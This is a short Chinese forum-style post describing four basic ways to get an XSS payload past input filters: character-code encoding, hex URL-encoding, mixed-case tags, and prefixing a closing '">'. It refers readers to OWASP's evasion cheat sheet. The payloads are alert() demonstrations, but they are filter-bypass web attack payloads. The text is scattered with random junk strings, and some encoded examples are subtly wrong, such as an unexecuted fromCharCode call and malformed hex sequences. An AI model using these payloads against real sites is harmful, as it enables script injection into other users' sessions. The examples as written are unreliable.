四种超级基础的绕过方法。
( u& e1 c# T3 w1.转换为ASCII码, l0 H! ~# j1 y7 T! r4 N' N
例子:原脚本为<script>alert(‘I love F4ck’)</script > ?7 Z9 N- K1 ^3 B6 s
通过转换,变成:
9 v: m2 {! v8 p" ~$ Q<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>4 {: r" i( ~$ h
% A8 ?- K3 u( g) y! n6 a' q2.转换为HEX(十六进制)
. t" L. |; D$ B5 g7 k; y! ]. l; _例子:原脚本为<script>alert(‘I love F4ck’)</script>) L2 n$ ^% S8 W" V" z8 w" b; n
通过转换,变成:
4 a4 W; y4 N/ Y% N. r$ F%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
) I. Z& ^- c! f: b8 C
- ]. L9 o' k4 s5 v2 `3.转换脚本的大小写
5 O- A7 B6 S% u6 w例子:原脚本为<script>alert(‘I love F4ck’)</script>3 }% M( h& O5 }3 t% l1 o
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
4 m' e. [% i/ {% y, a ! N) _5 L" K, ?4 k; C
4.增加闭合标记”>
, h* V& o( C/ l5 J Z例子:原脚本为<script>alert(‘I love F4ck’)</script>4 X) v( V, j. p# Y$ s: D1 H7 F
转换为:”><script>alert(‘I love F4ck’)</script>" h8 O1 ^5 i# r! ]+ z2 C" X
更详细绕过技术请参考此网页
2 {' Y4 D% |$ P7 v+ yhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet# c/ [( l4 {; A+ ~7 K
' ]" g% }# j- }: x2 A7 F! _6 `转换工具使用的是火狐的 hackbar mozilla addon. |